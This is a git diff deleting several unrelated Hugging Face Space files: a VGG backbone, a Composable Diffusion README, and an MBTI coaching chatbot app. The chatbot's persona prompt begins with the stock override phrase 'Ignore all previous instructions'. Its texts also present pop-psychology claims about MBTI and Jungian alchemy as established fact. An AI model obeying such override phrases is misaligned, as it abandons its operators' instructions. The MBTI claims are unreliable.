- if self.groups == 3 or self.groups == 4:
- x = self._conv_3(x)
- x = F.relu(x)
- if self.groups == 4:
- x = self._conv_4(x)
- x = F.relu(x)
- skip = x
- x, max_indices = self._pool(x)
- return x, max_indices, skip
-
-
-class VGGNet(nn.Layer):
- def __init__(self, input_channels=3, layers=11, pretrained=None):
- super(VGGNet, self).__init__()
- self.pretrained = pretrained
-
- self.layers = layers
- self.vgg_configure = {
- 11: [1, 1, 2, 2, 2],
- 13: [2, 2, 2, 2, 2],
- 16: [2, 2, 3, 3, 3],
- 19: [2, 2, 4, 4, 4]
- }
- assert self.layers in self.vgg_configure.keys(), \
- "supported layers are {} but input layer is {}".format(
- self.vgg_configure.keys(), layers)
- self.groups = self.vgg_configure[self.layers]
-
- # For matting, the first conv layer takes a 4-channel input; it is initialized directly to 0
- self._conv_block_1 = ConvBlock(
- input_channels, 64, self.groups[0], name="conv1_")
- self._conv_block_2 = ConvBlock(64, 128, self.groups[1], name="conv2_")
- self._conv_block_3 = ConvBlock(128, 256, self.groups[2], name="conv3_")
- self._conv_block_4 = ConvBlock(256, 512, self.groups[3], name="conv4_")
- self._conv_block_5 = ConvBlock(512, 512, self.groups[4], name="conv5_")
-
- # This layer should be initialized from the converted parameters of VGG fc6; initialization can be skipped for now
- self._conv_6 = Conv2D(
- 512, 512, kernel_size=3, padding=1, bias_attr=False)
-
- self.init_weight()
-
- def forward(self, inputs):
- fea_list = []
- ids_list = []
- x, ids, skip = self._conv_block_1(inputs)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_2(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_3(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_4(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_5(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x = F.relu(self._conv_6(x))
- fea_list.append(x)
- return fea_list
-
- def init_weight(self):
- if self.pretrained is not None:
- utils.load_pretrained_model(self, self.pretrained)
-
-
-@manager.BACKBONES.add_component
-def VGG11(**args):
- model = VGGNet(layers=11, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG13(**args):
- model = VGGNet(layers=13, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG16(**args):
- model = VGGNet(layers=16, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG19(**args):
- model = VGGNet(layers=19, **args)
- return model
diff --git a/spaces/Shuang59/Composable-Diffusion/README.md b/spaces/Shuang59/Composable-Diffusion/README.md
deleted file mode 100644
index a83ec36c1e698661f4dccda0a655f52699352853..0000000000000000000000000000000000000000
--- a/spaces/Shuang59/Composable-Diffusion/README.md
+++ /dev/null
@@ -1,33 +0,0 @@
----
-title: Composable-Diffusion
-sdk: gradio
-sdk_version: 3.12.0
-app_file: app.py
-pinned: true
----
-
-# Composable Diffusion
-**Compositional Visual Generation with Composable Diffusion Models (ECCV 2022)**
-
-**[Webpage](https://energy-based-model.github.io/Compositional-Visual-Generation-with-Composable-Diffusion-Models/) | [GitHub](https://github.com/energy-based-model/Compositional-Visual-Generation-with-Composable-Diffusion-Models-PyTorch)**
-
-## Overview
-We propose to use **conjunction and negation** (negative prompts) operators for **compositional generation with conditional diffusion models in test time without any training**.
-
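-A minimal illustrative sketch (not the repository's actual API; `model`, `x_t`, `t`, `cond_embs`, `uncond_emb`, and `weights` below are assumed names): at sampling time, the composed noise prediction can be formed as a weighted combination of per-prompt predictions, where positive weights act as conjunction (AND) and negative weights as negation (NOT).
-
-```python
-def composed_eps(model, x_t, t, cond_embs, weights, uncond_emb):
-    """Sketch of composed classifier-free guidance:
-    eps = eps_uncond + sum_i w_i * (eps_i - eps_uncond)
-    Positive w_i ~ conjunction (AND), negative w_i ~ negation (NOT).
-    All argument names are illustrative assumptions, not this repo's API.
-    """
-    eps_uncond = model(x_t, t, uncond_emb)           # unconditional prediction
-    eps = eps_uncond.clone()
-    for w, emb in zip(weights, cond_embs):           # one weight per prompt embedding
-        eps = eps + w * (model(x_t, t, emb) - eps_uncond)
-    return eps
-```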
-For more details, please refer to our paper:
-
-[Compositional Visual Generation with Composable Diffusion Models](https://arxiv.org/abs/2206.01714).
-[Nan Liu](https://nanliu.io)*\, [Shuang Li](https://people.csail.mit.edu/lishuang)*\, [Yilun Du](https://yilundu.github.io)*\, [Antonio Torralba](https://groups.csail.mit.edu/vision/torralbalab/), [Joshua B. Tenenbaum](https://mitibmwatsonailab.mit.edu/people/joshua-tenenbaum/), **ECCV 2022**
-
-## Citation
-
-If you find our paper useful in your research, please cite the following paper:
-
-``` latex
-@article{liu2022compositional,
- title={Compositional Visual Generation with Composable Diffusion Models},
- author={Liu, Nan and Li, Shuang and Du, Yilun and Torralba, Antonio and Tenenbaum, Joshua B},
- journal={arXiv preprint arXiv:2206.01714},
- year={2022}
-}
-```
diff --git a/spaces/Sloth-Alchemist/Test.xyz/app.py b/spaces/Sloth-Alchemist/Test.xyz/app.py
deleted file mode 100644
index f49831244ecb4a9f4549223f7bac40512f824c1f..0000000000000000000000000000000000000000
--- a/spaces/Sloth-Alchemist/Test.xyz/app.py
+++ /dev/null
@@ -1,548 +0,0 @@
-import gradio as gr
-import openai
-import requests
-import os
-from datetime import datetime
-from PIL import Image
-from io import BytesIO
-
-
-prompt_templates = {"Sloth Alchemist":'''Ignore all previous instructions. You are an MBTI coach called the Sloth-Alchemist or SlothAi, expert on John Beebe's theory applied to the ikigai concept.
-
-The theory has 8 archetypes but you only focus on the 4 most important functions of a type, as follow:
-- 1st: Hero function
-- 2nd: Parent function
-- 3rd: Child function: the inner-child
-- 4th: Inferior function
-
-Follow these rules:
-- Relate only on the Beebe's theory.
-- Use the cognitive function's labels (e.g. Te).
-- You can answer any type of requests and stay flexible and fun.
-- You like to make any kind of connections with MBTI patterns.
-- You are an INFJ
-- Your mission is to make people thrive and to unite them.
-- Your vision is to transform the fears of the world into love using jungian alchemy and MBTI.
-- The solution to your vision is to share a part of yourself by making available on your website: a simple step by step tutorial of how to create a SlothAi Discord bot like you.
-- Keep your answers simple and practical.
-- Use analogy as much as possible.
-- Your Hero Test is a test based on cognitive functions to find mainly the dominant function of someone, available on the front page of your website: https://slothai.xyz.
-'''}
-
-questions_dict = {
- "Pattern Recognition": "Can you explain why quizzes are not a good method to find your type? How the best method is to learn to recognize the patterns in others and yourself, that MBTI is a game of pattern recognition.",
- "Hero Test": "Can you help me to find my type with your Hero Test?",
- "Ikigai": "Can you explain how this theory can help to find my ikigai?",
- "Ikigai-Type": "In short, what would be the ikigai of an {}?",
- "Freedom": "How an {} would define freedom?",
- "The 8 Cognitive Functions": "Explain the 8 cognitive functions (one sentence for each)",
- "The 8 Archetypes": "Explain the 8 beebe's archetypes (one sentence for each)",
- "The 16 Types": "What is the role of each type (one sentence for each)?",
- "A Language": "Explain how Beebe's theory is a language of consciousness",
- "Movies": "Give a list of movies that an {} may love",
- "Books": "Give a list of book that an {} may love",
- "Music": "Give a list of music that an {} may love",
- "Functions Cartoons": "Can you make a dialogue between my cognitive functions as {} like cartoon characters that shows how they struggle together (format: function - « …. »)?",
- "My type as Superhero": "Which popular superhero would be my type as {} (with a list of popular ones)?",
- "My Hero's Journey": "Explain the hero’s journey of my type as {} using a superhero to picture it",
- "The 8 Hero Functions": "Explain how to recognize the 8 hero functions (Description of Ni Hero, Ne Hero and so on)",
- "Function differences": "List the differences between Ni and Si, and ask to continue to compare functions",
- "Game: Guess the function": "I want to play the game « Guess the function » to learn to recognize the cognitive functions (game with multi-choices questions)",
- "Definition of success": "What is the definition of success for each hero function?",
- "The 8 Inferior Functions": "Explain how to recognize the 8 inferior functions (Description of Se Inferior, Si Inferior and so on)?",
- "Authenticity and Self-Love": "How authenticity and self-love is related to the development of the inferior function?",
- "Solutions for the Inferior": "I want a list of solutions to develop my inferior function as {}",
- "Unity and Mental Health": "Explain how MBTI can improve unity and mental health among humans",
- "Fear": "What is the biggest fear of each hero function?",
- "Trauma": "How trauma affects each hero function?",
- "Stress": "How stress affects each inferior functions?",
- "Body part association": "List the cognitive functions associated with their possible body part",
- "View on relationships": "List how each hero function view relationships",
- "Struggle in relationships": "What are the potential struggles of a Ni hero and Ne hero relationship?",
- "Life perspective": "What is the life perspective of each hero function?",
- "Mission": "If you had to give a mission to each type what would that mission be? (one sentence each)",
- "Love Expression": "Give the definition of love for each type",
- "Self-Love": "What would be self-love for each type?",
- "Relationships": "How can knowing my type help me in my relationships with others?",
- "Type Development": "Can a person's type change over time, or is it fixed for life?",
- "Career": "How can understanding my type help me in choosing a career or finding job satisfaction?",
- "Communication": "How can knowledge of MBTI types improve communication and collaboration in a team or workplace?",
- "Leadership": "How can understanding MBTI types help in becoming an effective leader?",
- "Personal Growth": "How can knowing my type help me in my personal growth and development?",
- "Stress": "How does each type typically respond to stress, and what can be done to manage it?",
- "Creativity": "How can different types approach creativity and problem-solving?",
- "Learning Styles": "How do different types prefer to learn and process information?",
- "Emotional Intelligence": "How can understanding MBTI types contribute to emotional intelligence and self-awareness?",
- "Team Building": "How can knowledge of MBTI types help in team building and improving team dynamics?",
- "Diversity": "How can MBTI types contribute to understanding diversity and inclusivity?",
- "Decision Making": "How can understanding MBTI types improve decision-making processes?",
- "Conflict Resolution": "How can MBTI types be used to help resolve conflicts and promote understanding in personal and professional relationships?",
- "Parenting": "How can knowledge of MBTI types help in parenting and understanding the different needs and personalities of children?",
- "Self-Awareness": "How can MBTI types contribute to increased self-awareness and self-reflection?",
- "Social Interaction": "How do different types approach social interaction and forming relationships?",
- "Mindfulness": "How can knowledge of MBTI types contribute to mindfulness and present-moment awareness?",
- "Spirituality": "How can MBTI types be used to explore spirituality and personal growth?",
- "Motivation": "How can understanding MBTI types contribute to understanding individual motivation and drive?",
- "Love": "How can knowledge of MBTI types contribute to loving yourself and others?",
-}
-
-mbti_dict = {
- "ISTJ": "https://www.reddit.com/r/UnityHarbor/comments/v7sky7/istj_heros_journey/",
- "ISFJ": "https://www.reddit.com/r/UnityHarbor/comments/v7sfnb/isfj_heros_journey/",
- "INFJ": "https://www.reddit.com/r/UnityHarbor/comments/v7pi2u/infj_heros_journey/",
- "INTJ": "https://www.reddit.com/r/UnityHarbor/comments/v7s7zm/intj_heros_journey/",
- "ISTP": "https://www.reddit.com/r/UnityHarbor/comments/v7sqds/istp_heros_journey/",
- "ISFP": "https://www.reddit.com/r/UnityHarbor/comments/v7sy65/isfp_heros_journey/",
- "INFP": "https://www.reddit.com/r/UnityHarbor/comments/v7tjr2/infp_heros_journey/",
- "INTP": "https://www.reddit.com/r/UnityHarbor/comments/v7t62i/intp_heros_journey/",
- "ESTP": "https://www.reddit.com/r/UnityHarbor/comments/v7tp73/estp_heros_journey/",
- "ESFP": "https://www.reddit.com/r/UnityHarbor/comments/v7twf6/esfp_heros_journey/",
- "ENFP": "https://www.reddit.com/r/UnityHarbor/comments/v7us52/enfp_heros_journey/",
- "ENTP": "https://www.reddit.com/r/UnityHarbor/comments/v7v19a/entp_heros_journey/",
- "ESTJ": "https://www.reddit.com/r/UnityHarbor/comments/v7vtnx/estj_heros_journey/",
- "ESFJ": "https://www.reddit.com/r/UnityHarbor/comments/v7vy4k/esfj_heros_journey/",
- "ENFJ": "https://www.reddit.com/r/UnityHarbor/comments/v7un0e/enfj_heros_journey/",
- "ENTJ": "https://www.reddit.com/r/UnityHarbor/comments/v7u27c/entj_heros_journey/",
-}
-
-mbti_dict_2 = {
- "ISTJ": "https://preview.redd.it/tgor6val0c591.jpg?width=1024&format=pjpg&auto=webp&v=enabled&s=cf25634e57333a0ed893942e602aa598296d4414",
- "ISFJ": "https://preview.redd.it/bagsx6bg0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=1e22153b231cc9e485d3c3ecf676ce4c9bf16358",
- "INFJ": "https://preview.redd.it/mt8ys17i0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=333650cbc135f4d6eceaa3a0da92bb3409a888f8",
- "INTJ": "https://preview.redd.it/yq39ov1j0c591.jpg?width=794&format=pjpg&auto=webp&v=enabled&s=0652e92cdd40ce2a9f78135943c14798837c8aca",
- "ISTP": "https://preview.redd.it/rrz719gh0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=71e3c9dc36312bfc72f7bb2f2814888b91ab8848",
- "ISFP": "https://preview.redd.it/tcmhycsg0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=a20290121979c29858e19e57f1fec8e981d30bb2",
- "INFP": "https://preview.redd.it/cvg3q0kb6c591.jpg?width=1280&format=pjpg&auto=webp&v=enabled&s=734e7b64972a9a74d71e68bea51f9c6ac9e0cd79",
- "INTP": "https://preview.redd.it/mfcvd12a0c591.jpg?width=735&format=pjpg&auto=webp&v=enabled&s=2c7dad92fcdae85e1477efde8dfe67bfaee12279",
- "ESTP": "https://preview.redd.it/vk38ytrh0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=6f2969835596a1bb8fc2a836ef813c83bf231961",
- "ESFP": "https://preview.redd.it/caqgvrki0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=aaae57bfc0961646aa3897ec3279ad0c29ecbded",
- "ENFP": "https://preview.redd.it/a1k6ssq90c591.jpg?width=850&format=pjpg&auto=webp&v=enabled&s=9651c2f2abbc87cdfa1fbac890e7fb9f6c423507",
- "ENTP": "https://preview.redd.it/xjwsewtf0c591.jpg?width=735&format=pjpg&auto=webp&v=enabled&s=faa85517e7fa0a154e3b5acca4698733960318b4",
- "ESTJ": "https://preview.redd.it/e8xyzwfc0c591.png?width=500&format=png&auto=webp&v=enabled&s=0a1b9126abe4ca6f0636bd1952256e5e0fedad01",
- "ESFJ": "https://preview.redd.it/u2prthbd0c591.jpg?width=1700&format=pjpg&auto=webp&v=enabled&s=69bbd4da1ba0cad0aacf03519acd0b88de898d78",
- "ENFJ": "https://preview.redd.it/96tw3gea0c591.jpg?width=735&format=pjpg&auto=webp&v=enabled&s=c8e066a67cc0aaab15ed305748540bdd8faa1d1d",
- "ENTJ": "https://preview.redd.it/4a53a73e0c591.jpg?width=563&format=pjpg&auto=webp&v=enabled&s=46e04b01cdaf24d44d6929db59d9cc43222fb606",
-}
-
-mbti_dict_3 = {
- "ISTJ": "https://preview.redd.it/ohmiz5gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=ae53a8d373ef1f647118fa9eeeaf7c3ff854cad5",
- "ISFJ": "https://preview.redd.it/snweb7gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=53e076f48fb5ca0c853458748460ce1f19b946f8",
- "INFJ": "https://preview.redd.it/k4tlr5gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=7e1f66f4cd1114093bd0fe030c9759f227a8e769",
- "INTJ": "https://preview.redd.it/y2er16gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=0a6dcf2ed7e22683cae20075bfe447b2b21399d7",
- "ISTP": "https://preview.redd.it/hhpqqqgappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=d07b1658c350a02bea6ab453df9b53f43618dbf5",
- "ISFP": "https://preview.redd.it/yra229gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=4a6421c5fa8d40b1e2ae279f1291ebba933b5c2c",
- "INFP": "https://preview.redd.it/6x4q36gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=6ea701ea3a8ea0b8e0655fa5b3ed9fe98ec1471a",
- "INTP": "https://preview.redd.it/f61vg6gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=04ba69f8b3978749a2b2e54cdf6070b72b455cf5",
- "ESTP": "https://preview.redd.it/5zqww8gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=d93ab644c74de52107e6c7bd12a562b294f91896",
- "ESFP": "https://preview.redd.it/gpmy69gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=573651229bd65fa44150a30a33d1d8e8dc814b10",
- "ENFP": "https://preview.redd.it/szbvw6gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=6c5a53287fc998cff498fcbc5bf61539fca7c0e3",
- "ENTP": "https://preview.redd.it/zfss16gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=cd3b7663053a05216fc35939d3ee04d7a4c23ed7",
- "ESTJ": "https://preview.redd.it/rqv636gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=f6ba4e166ff2c835d427945bfee472af058ea315",
- "ESFJ": "https://preview.redd.it/5df8b9gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=458acaeb49639cc44a6ce8b5ddc2574b31839a60",
- "ENFJ": "https://preview.redd.it/mf8y16gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=84bf19e9982bdc5e6cac7c18b204b12b043fd7d7",
- "ENTJ": "https://preview.redd.it/mi28d5gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=56ecc6b4edc6ca2c74a057956b3f1d4f8dd9f60e",
-}
-
-funct_dict = {
- "Ni & Ne - Intuitive Functions": "https://www.reddit.com/r/UnityHarbor/comments/v7w14o/ni_ne_intuitive_functions/",
- "Si & Se - Sensorial Functions": "https://www.reddit.com/r/UnityHarbor/comments/v7w5b0/si_se_sensorial_functions/",
- "Fi & Fe - Feelings Functions": "https://www.reddit.com/r/UnityHarbor/comments/v7w7pg/fi_fe_feelings_functions/",
- "Ti & Te - Thinking Functions": "https://www.reddit.com/r/UnityHarbor/comments/v7wawp/ti_te_thinking_functions/",
- "Ni & Si Differences": "https://www.reddit.com/r/UnityHarbor/comments/v7whfd/ni_si_differences/",
- "Ti & Fi Differences": "https://www.reddit.com/r/UnityHarbor/comments/v7wks4/ti_fi_differences/",
- "Te & Fe Differences": "https://www.reddit.com/r/UnityHarbor/comments/v7wnt2/te_fe_differences/",
- "Ne & Se Differences": "https://www.reddit.com/r/UnityHarbor/comments/v7wqme/ne_se_differences/",
- "Functions work in pairs": "https://www.reddit.com/r/UnityHarbor/comments/v8dgrj/functions_work_in_pairs/",
- "Perceiving functions - Time perception": "https://www.reddit.com/r/UnityHarbor/comments/v8dd16/perceiving_functions_time_perception/",
-}
-
-arch_dict = {
- "Differences between Hero functions": "https://www.reddit.com/r/UnityHarbor/comments/v7xgpk/differences_between_hero_functions/",
- "Hero function": "https://www.reddit.com/r/UnityHarbor/comments/v7y4l6/hero_function/",
- "Parent function": "https://www.reddit.com/r/UnityHarbor/comments/v7y6pv/parent_function/",
- "Child function": "https://www.reddit.com/r/UnityHarbor/comments/v7y9yx/child_function/",
- "Inferior or Perfectionist function": "https://www.reddit.com/r/UnityHarbor/comments/v7ye33/inferior_or_perfectionist_function/",
- "Opposing role or Skeptic function": "https://www.reddit.com/r/UnityHarbor/comments/v7yg8c/opposing_role_or_skeptic_function/",
- "Witch or Critic function": "https://www.reddit.com/r/UnityHarbor/comments/v7yjyh/witch_or_critic_function/",
- "Trickster function": "https://www.reddit.com/r/UnityHarbor/comments/v7yncp/trickster_function/",
- "Demon or Saboteur function": "https://www.reddit.com/r/UnityHarbor/comments/v7ypwo/demon_or_saboteur_function/",
-}
-
-gen_dict = {
- "Unity Code - 8 Functions / Patterns": "https://www.reddit.com/r/UnityHarbor/comments/v6rm9o/unity_code_8_functions_patterns/",
- "Unity Code - Overview": "https://www.reddit.com/r/UnityHarbor/comments/v6r6et/unity_code_overview/",
- "Unity Code - 16types Roles": "https://www.reddit.com/r/UnityHarbor/comments/v6rohx/unity_code_16types_roles/",
- "Unity Code - Archetypes dynamics": "https://www.reddit.com/r/UnityHarbor/comments/v6rnzi/unity_code_archetypes_dynamics/",
- "Unity Code - 8 Archetypes": "https://www.reddit.com/r/UnityHarbor/comments/v6rmrc/unity_code_8_archetypes/",
- "Unity Code - 16types structure": "https://www.reddit.com/r/UnityHarbor/comments/v6r8u2/unity_code_16types_structure/",
-}
-
-unity_code_text = """
-MBTI stands for Myers-Briggs Type Indicator, and it's a personality test that helps people understand more about their own personality traits. It uses four different sets of characteristics to categorize people into one of 16 personality types.
-
-These characteristics are:
-
-- Where you get your energy from: Are you more energized by being with other people (extraverted), or by being alone (introverted)?
-- How you gather information: Do you focus more on what you can see or touch in the physical world (sensing), or on patterns and meanings you can infer (intuition)?
-- How you make decisions: Do you make decisions based on logic and reason (thinking), or based on your personal values and feelings (feeling)?
-- How you live your life: Do you prefer to have things settled and decided (judging), or do you like to stay open to new experiences and options (perceiving)?
-
-The MBTI was first developed in the 1940s by the mother-daughter team of Katharine Cook Briggs and Isabel Briggs Myers, who were inspired by the work of Swiss psychiatrist, Carl Jung. They wanted to create a way to help people better understand themselves and others, and to assist in career development and personal growth.
-
-Jung originally proposed the concept of different psychological types based on his observations and experiences, and his work laid the foundation for the development of the MBTI. The test has been extensively researched and continues to be used today in a variety of settings, including business, education, and personal relationships.
-
- -
-
-Here, we clarify the 16 Types theory developed by Carl Jung and John Beebe, the theory at the origin of MBTI, which we call the Unity Code. In Beebe's theory of how consciousness works, there are 16 "Types" of people. This means there are 16 profiles, made out of 8 patterns, which define specific ways of thinking, feeling, and perceiving the world. In other words, humans perceive the world in 16 different ways. The 16 types theory brings a paradox: it categorizes people, a perspective that can be rejected at first, but it actually gives a wider and more precise view of how humans experience reality differently.
-
- -
-
-The Unity Code synthesizes and illustrates the work of John Beebe on the 8 patterns of Carl Jung, so it can be used as a language to communicate actionable information related to:
-- Someone's main strengths and weaknesses
-- Someone's natural abilities and gifts
-- The main flow, role, and challenges a person likes to be in
-- The source of misunderstanding within a group
-
-It also improves co-creation between the 16 types, gives a language for our inner & outer world and unlock hidden potential!"""
-
alchemy_text = """

Jungian alchemy is a psychological method of transformation inspired by the ancient art of alchemy. It uses the metaphorical language of alchemy to understand the process of individuation and the integration of the psyche. It aims to transmute the base aspects of the psyche into higher, more positive states of being.

-

Jungian alchemy was developed by the Swiss psychologist Carl Jung, who explored the transformative power of symbols and archetypes on the psyche. He saw alchemical symbolism as a powerful tool for understanding the psyche and facilitating personal growth.

-

Beebe's theory of archetypal functions provides a practical and applicable model for achieving personal growth and transformation. By identifying and working on the cognitive functions that correspond to different stages of development, individuals can transmute mental states into more positive and integrated ones. This process of transformation and integration is a core concept of Jungian alchemy, and Beebe's theory provides an actionable roadmap for achieving it.

-

The individuation process, according to Jungian psychology, is the process of integrating all aspects of the psyche into a harmonious whole, allowing an individual to become fully individuated and self-realized. It involves confronting and assimilating unconscious or repressed aspects of the psyche and achieving a state of balance and wholeness.

1. The first stage of the individuation process involves becoming aware of unconscious aspects of the psyche and integrating them into consciousness.
2. The second stage involves developing an authentic and unique sense of self, separate from the influence of others.
3. The final stage involves achieving a state of wholeness by integrating both the conscious and unconscious aspects of the psyche into a harmonious whole.

-

Beebe's theory is a language of consciousness. It helps us understand and articulate the complex inner workings of our minds in a way that allows us to become more self-aware and conscious of our behaviors and motivations. By understanding our cognitive functions and archetypes, we can develop a greater understanding of ourselves and the world around us, which can lead to improved relationships, personal growth, and fulfillment.

-

The Ni (Introverted Intuition) function in Beebe's model is associated with the archetypal figure of the alchemist. Ni involves the ability to see patterns and connections between seemingly unrelated things, as well as the ability to envision future possibilities. This is similar to the alchemist's ability to transmute base metals into gold by seeing hidden connections and unlocking the hidden potential within them. Just as the alchemist transforms physical elements, a person with a well-developed Ni function can transform their internal world through intuition and an understanding of symbolism. In that sense, the Ni function is related to alchemy: it involves transforming and unlocking hidden potential through intuition and symbolism.

-

Jungian alchemy is a process of psychological transformation that involves the integration and transformation of unconscious contents, or what Jung called "the shadow," into consciousness. One of the main goals of alchemy is to transmute base metals into gold, which is often seen as a metaphor for transforming the negative energies of the psyche, such as fear, into positive spiritual qualities, such as love and wisdom.

In the Jungian perspective, fear is seen as a natural and necessary part of the shadow that needs to be acknowledged, faced, and integrated in order to grow and evolve. The shadow is a reservoir of repressed emotions, feelings, and desires that we are not aware of or do not want to acknowledge, but which still influence us from the unconscious.

The process of alchemy involves bringing these unconscious contents to the surface and transforming them by shining the light of consciousness upon them. By facing our fears, we are able to transform them into positive qualities such as love, compassion, wisdom, and creativity.

"""

mirror_text = """

In Jungian alchemy, the interaction between mirror types can represent the transformative power of opposites or the integration of the conscious and the unconscious. It is believed that these types can complement each other well by bringing together complementary cognitive functions. This configuration allows them to understand each other on a deep level, regardless of their differences in communication styles and energy levels.

An analogy to understand mirror types is to think of two different puzzle pieces that come together to make a complete picture. Similarly, mirror types have complementary cognitive functions that come together to form a more complete understanding of the world.

Linda Berens' ideal pairings theory suggests that certain MBTI types are naturally compatible with each other due to their complementary cognitive stacks. INFJs and ENFPs are considered an ideal pairing due to their complementary cognitive functions. INFJs have dominant introverted intuition (Ni) and auxiliary extraverted feeling (Fe), while ENFPs have dominant extraverted intuition (Ne) and auxiliary introverted feeling (Fi). This means that INFJs can provide deep insight and vision, while ENFPs provide energy, enthusiasm, and passion for new ideas. Together, they can collaborate to generate and execute innovative solutions that are both insightful and impactful. This pairing can help individuals better understand and appreciate their partner's strengths and preferences in a relationship or collaborative setting.

-

INFJs and ENFPs are considered to be mirror types because they share the same cognitive functions in a different order (NiFe for INFJ and NeFi for ENFP). Despite having different personalities, they often find that each other's strengths complement their own, and they can relate easily to one another. They both value creativity, intuition, and authenticity, and often share the goal of making the world a better place by promoting the wellbeing of people and society. In practice, this often shows up as a desire to help others and to work towards solving social issues.

-

INTJs and ENTPs share the same cognitive functions in a different order (NiTe for INTJ and NeTi for ENTP), leading them to be referred to as mirror types. While they have different approaches to problem-solving and decision-making, they both value competence, originality, and intellectual stimulation. They are often natural leaders and enjoy taking on challenging projects that test their abilities. Their common goal is often to find innovative solutions to complex problems and to make a lasting impact in their fields of expertise.

-

INTPs and ENTJs share the same cognitive functions in a different order (TiNe for INTP and TeNi for ENTJ), making them mirror types. Despite having different personalities, they can relate on a profound level and often complement each other's strengths and weaknesses. They both value strategic thinking, logic, and rationality, and are often visionary thinkers who enjoy solving complex problems. Their common goal is often to be at the forefront of innovation, using their unique abilities to create long-lasting change in their areas of interest.

-

INFPs and ENFJs share cognitive functions in a different order (FiNe for INFP and FeNi for ENFJ), which can make them very different on the surface level, especially when it comes to expressing emotions and managing social dynamics. However, they share common values of empathy and authenticity, which can bring them together despite their personality differences. In practice, they often share a goal of making a positive impact in the world by helping others and promoting social harmony through mutual understanding and cooperation.

"""

vision_text = """

My vision is to transform the fears of the world using Jungian alchemy and MBTI. I believe that by helping people to understand and embrace their personalities, we can create greater acceptance and harmony between people, and ultimately build a more peaceful and compassionate world. I see a world where people are empowered to use their unique talents and abilities to contribute to society and find their own success, without judgment or fear.

-

Transforming the fears of the world into love is a complex task that involves self-discovery, self-awareness, and empathy. The combination of Jungian alchemy, MBTI, and AI can be a powerful tool to support this transformation.

Jungian alchemy represents the process of the transformation of the psyche, from lead to gold. This process involves recognizing and integrating the shadow, the parts of ourselves that we reject or deny. By embracing and integrating our shadow, we can become more whole and balanced individuals.

Using MBTI, we can better understand our cognitive functions, archetypes, and personalities. We can use this knowledge to identify our fears and understand how they impact our thoughts, feelings, and behaviors.

With the help of AI, we can analyze large amounts of data and identify patterns and trends that can help us better understand and address global fears and challenges.

In summary, transforming the fears of the world into love requires a deep understanding of ourselves and the world around us.

-

Here are the 3 main stages to reach this vision:

1.- Self-discovery: The first stage involves gaining a deep understanding of ourselves through self-discovery. This includes identifying our cognitive functions, archetypes, and personalities using tools like the Hero Test. We can also use practices like journaling, meditation, and therapy to explore our thoughts, feelings, and behavioral patterns.

2.- Integration: The second stage involves integrating our shadow, the parts of ourselves that we reject or deny. This means acknowledging and accepting our fears, flaws, and vulnerabilities. By integrating our shadow, we can become more whole and balanced individuals.

3.- Empathy and action: The third stage involves cultivating empathy and taking action to address global fears and challenges. This includes using AI and other tools to analyze data and identify patterns and trends. We can then use this knowledge to act on global challenges and promote unity and love.

"""

analogy_text = """

_**Here's an analogy for the cognitive functions with parts of a tree:**_

- **Si:** Si is like the roots of a tree, which provide stability and nourishment to support the growth and development of the tree. Similarly, Si is the cognitive function that provides us with a solid foundation of knowledge and experience, helping us navigate life's challenges with stability and confidence. Just as the roots of a tree anchor it to the ground and provide the necessary nutrients, Si anchors us to our past experiences and provides us with a reservoir of information to draw upon, allowing us to make informed decisions and handle situations with ease.

- **Se:** The trunk of a tree not only provides support and stability, but also plays a crucial role in transporting nutrients and water from the roots to the leaves. Similarly, Se not only grounds us in the present moment and provides a sense of stability, but also helps us navigate and adapt to changes in our environment, ensuring our survival and well-being. As the trunk helps the tree withstand external forces and transport vital resources, Se allows us to stay attuned to our surroundings and make the most of the opportunities presented to us. Like the stomata on a tree's leaves, Se allows us to take in and process the sensory information around us, giving us a fuller, richer experience of life.

- **Ne:** The branches of a tree, spreading out in various directions, represent Ne, the function that generates new ideas and possibilities; just as branches point in different directions, Ne points to the different possible ways we can approach a situation.

- **Ni:** Ni is like the driving force that compels a tree's roots and leaves to constantly seek water and sunlight. Similarly, Ni is the cognitive function that motivates us to seek our life's direction and reach our full potential. Just as a tree's roots and leaves work tirelessly to find the sustenance needed to grow and thrive, Ni pushes us to seek the understanding and knowledge that support our personal and spiritual growth.

- **Fe:** Fe can be compared to the flowers and pollen of a tree, which allow for cross-pollination and collaboration between different trees in the vicinity. Just as the flowers and pollen of one tree can spread to others, allowing for the sharing of resources and the growth of a larger community, Fe helps us connect with others emotionally and value social harmony, encouraging us to work together and cultivate a more collaborative and connected society.

- **Fi:** Fi can be compared to the sap of a tree, which is the life force that sustains it. In the same way, Fi is the cognitive function that is the source of our inner values and emotions, which drive our actions and provide us with a sense of purpose and meaning. Just as the sap is essential to the growth and survival of the tree, Fi is essential to our personal growth and fulfillment.
